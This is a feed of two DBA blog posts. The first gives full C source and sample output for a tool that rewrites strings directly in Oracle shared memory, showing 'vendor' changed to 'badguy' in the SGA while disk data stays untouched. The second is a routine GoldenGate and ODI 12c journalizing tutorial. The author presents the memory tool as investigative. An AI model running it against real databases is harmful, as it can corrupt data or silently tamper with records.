[oracle@localhost shared_memory]$ more sga_data_replace.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/mman.h>
#include <sys/stat.h>

void replace_sga(char search_string[], char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        // stop search_length bytes before the end so the comparison
        // never reads past the mapped region
        for (i = 0; i + search_length <= fileInfo.st_size; i++)
        {
          for (j = 0; j < search_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j == search_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        munmap(data, fileInfo.st_size);
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace searchstring replacestring\n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters with the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, while the data on disk remained untouched (verified by flushing the buffer cache and forcing a re-read from disk). In the transcript below, the replace tool was run after the commit, so the first select returns the patched value from SGA; once the buffer cache is flushed, the original value is re-read from disk.


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

Rittman Mead Consulting - Thu, 2014-07-10 15:26

In this post, the finale of the four-part series “GoldenGate and Oracle Data Integrator – A Perfect Match in 12c”, I’ll walk through the setup of the ODI Models and start journalizing in “online” mode. This will utilize our customized JKM to build the GoldenGate parameter files based on the ODI Metadata and deploy them to both the source and target GoldenGate installation locations. Before I get into all of the details, let’s recap the first 3 posts and see how we arrived at this point.

Part one of the series, Getting Started, led us through a quick review of the Oracle Reference Architecture for Information Management and the tasks we’re trying to accomplish: loading both the Raw Data Reservoir (RDR) and Foundation schemas simultaneously using Oracle GoldenGate 12c replication, and setting it all up via Oracle Data Integrator 12c. We also reviewed the setup of the GoldenGate JAgent process, necessary for communication between ODI and GoldenGate when using the “online” version of the Journalizing Knowledge Module.

In part two, we reviewed the Journalizing Knowledge Module, “JKM Oracle to Oracle Consistent (OGG Online)”, its new features, and how much it has been improved in ODI 12c. Full integration with Oracle GoldenGate, through the use of the new ODI Tool “OdiOggCommand”, allows for the setup and configuration of GoldenGate process groups, trail file directories, and table-level supplemental logging, all from the ODI JKM.

Most recently, part 3, titled Setup Journalizing, walked us through the customizations of the “JKM Oracle to Oracle Consistent (OGG Online)” that allow us to create the source-to-foundation replication alongside the standard source-to-RDR setup. We added a set of options: the first controls whether or not we replicate to Foundation, and the second captures the ODI Logical Schema corresponding to the Foundation schema. Then we added the task that creates the source-to-foundation table mapping inside the GoldenGate replicat parameter file, and set the options appropriately. I’ve been using the ODI 12c Getting Started VM, with the 12.1.2 version of ODI, for my demo setup. If you haven’t done so already, you can download the latest version of the VM, with ODI 12.1.3, from the Oracle Technology Network. That’s enough recap; on to the final steps for GoldenGate and ODI 12c integration. Let’s start journalizing!

Setup ODI Models Create Models

We first need to create the ODI Models and Datastores for the Source, Staging (Raw Data Reservoir) and Foundation tables. I will typically reverse engineer the source tables into a Model first, then copy them to the Staging and Foundation Models. This approach will ensure the column names and data types remain consistent with the source. I then execute a Groovy script to create the additional data warehouse audit columns in each of the Foundation Datastores.

models

Configure JKM

Unlike the 11g version of ODI, in 12c the “JKM Oracle to Oracle Consistent (OGG Online)” Knowledge Module will be set on the source Model. Open up the Model, in this example, PM_SRC, and switch to the Journalizing tab.

model-journalizing

We’ll set the Journalizing Mode to “Consistent Set” and then choose the customized JKM that we have been working with in this example, “JKM Oracle to Oracle Consistent (OGG Online) RM”, from the dropdown list. Now we are presented with the GoldenGate Process Selection parameters and a list of KM Options to configure.

Set the Process Selection parameters for the Capture Process and Delivery Process by selecting the Logical Schemas created in Part 3 - Setup GoldenGate Topology – Schemas. This setting drives the naming of the Extract, Pump, and Replicat parameter files and process groups in GoldenGate. If you plan to use GoldenGate for the initial load, select the processes here as well. I’m not setting mine, as I typically use a batch load tool, such as Oracle Datapump or insert across DBLink to perform the initial load of the target. As you can see in the image below, you can also create the Oracle GoldenGate Logical Schemas from the Model.

model-jkm-process

Next are the set of Options, including the 2 new Options added in the previous post. We can leave several of the values as the default, as they are specific to particular character sets or implementation on a multi-node Oracle RAC setup.

model-jkm-options

The Options we do want to set:

ONLINE - Set to “true” to enable the automatic GoldenGate configuration when Start Journal is run.
LOCAL_TEMP_DIR – Enter a directory local to the machine on which the Start Journal process will be executed. Be sure the user executing the Start Journal process has privileges to create/modify/remove directories and files.
APPLY_FOUNDATION – Custom Option, set to “true” to enable the addition of the source-to-foundation mapping to the GoldenGate Replicat parameter file.
FND_LSCHEMA – The Logical Schema for the Foundation layer, necessary when APPLY_FOUNDATION is true.

After the Options are set, the Model can be saved and closed. Back in the Designer Navigator, add the Datastores to CDC by either selecting each individual Datastore and adding it or by right-clicking the Model and choosing to add the entire set all at once.

model-add-to-cdc

Before we get on with using the JKM, there is one thing I forgot to mention in the previous post. When setting up the Logical Schema for the GoldenGate “Delivery” process, you must also set the target Logical Schema. If you fail to do so, you’ll get an error stating “SnpLSchema does not exist” when attempting any Change Data Capture commands on the source Model.

logical-schema-set-target

With the JKM set and the tables added to Change Data Capture, we can now add a Subscriber. Subscribers allow multiple mappings to consume the change data from the J$ tables at different intervals. For example, a table may be consumed by one mapping every hour, and then by an additional mapping each night. Two different Subscribers would be used in this case. In our example, I’ll create a single Subscriber named “PERFECT_MATCH”. Make sure the process runs successfully, then it’s time to start Journalizing.

Start Capturing Changes

With the setup and configuration out of the way, the rest is up to the JKM. We’re now able to right-click the source Model and select Change Data Capture–>Start Journal. This executes all of the Start Journal related steps in the JKM, which will create the CDC Framework (J$ tables, JV$ views, etc.), generate and deploy the GoldenGate parameter files (Extract, Pump, and Replicat), and configure and start the GoldenGate process groups. Be sure that the source and target GoldenGate Manager and JAgent processes are running prior to executing the Start Journal process. Also, make sure that the database is in ArchiveLog mode and ready for GoldenGate to capture transactions.

After the Start Journal process is successfully completed, you can browse to the source GoldenGate home directory, run GGSCI, and view the status of the OGG process groups.

ogg-src-info-all

It looks like the Extract and Pump are in place and running. Now let’s check out the Replicat on the target GoldenGate installation.

ogg-trg-info-all

Here we see that the Replicat process is in place, but not actually running. Remember from our JKM editing that we commented out the step that will start the Replicat process. This is to ensure we perform an initial load prior to applying any captured change data to the target.

The last bit of work that must be completed is the initial load. I won’t go into details here, but the way I like to do it is to load the source to the target data based on a captured SCN using Oracle Datapump or DBLink rather than using GoldenGate process groups to perform the load. Note: The ODI 12c Getting Started Guide doesn’t even use the OGG initial load! Then, we can start the replicat in GoldenGate after the captured SCN using the same approach I wrote about in a previous blog on ODI and GoldenGate 11g.
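As a sketch of that approach (the object names, database link, and SCN below are hypothetical), the SCN-consistent load and the replicat restart might look like:

```sql
-- Hypothetical names throughout. Load the target consistent to a
-- captured SCN, using a flashback query across a database link:
INSERT INTO edw.customer
  SELECT * FROM customer@src_dblink AS OF SCN 1234567;
COMMIT;

-- Then, in GGSCI on the target, start the replicat after that SCN:
-- START REPLICAT RPMEDWP, AFTERCSN 1234567
```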

JKM “Online” Mode

Beyond adding the parameter files and process groups, what exactly did the “online” version of the JKM do for us? If you browse to the directory that we set in the JKM Options under LOCAL_TEMP_DIR, you’ll find all of the GoldenGate files generated by the JKM. These files were generated locally, then uploaded to their proper GoldenGate home directory. Without “online” mode, they would have had to be manually copied to GoldenGate.

jkm-steps

Once uploaded, the obey files (batch files for GoldenGate commands) were executed.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTEOBEY" "-OBEY_FILE=/home/oracle/Oracle/Middleware/oggsrc/EXTPMSRC.oby"

And finally, JKM steps were generated to perform the creation of the process groups in GoldenGate.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
add extract EXTPMSRC, tranlog, begin now 
add exttrail /home/oracle/Oracle/Middleware/oggsrc/dirdat/oc, extract EXTPMSRC, megabytes 100
stop extract EXTPMSRC
start extract EXTPMSRC

If you ever need to stop the change data capture process, either to add additional tables or make modifications to the metadata, you can run the Drop Journal process. Not only will the CDC Framework of tables and views be removed, but the “online” mode also reaches into GoldenGate and drops the process groups that were generated by the JKM.

OdiOggCommand "-LSCHEMA=EXTPMSRC" "-OPERATION=EXECUTECMD"
stop extract RPMEDWP
delete extract RPMEDWP

In conclusion, the integration between GoldenGate and Oracle Data Integrator in 12c has been vastly improved over the 11g version. The ability to manage the entire setup process from within ODI is a big step forward, and I can only see these two products being further integrated in future releases. If you have any questions or comments about ODI or GoldenGate, or would like some help with your own implementation, feel free to add a comment below or reach out to me at michael.rainey@rittmanmead.com.

 

Categories: BI & Warehousing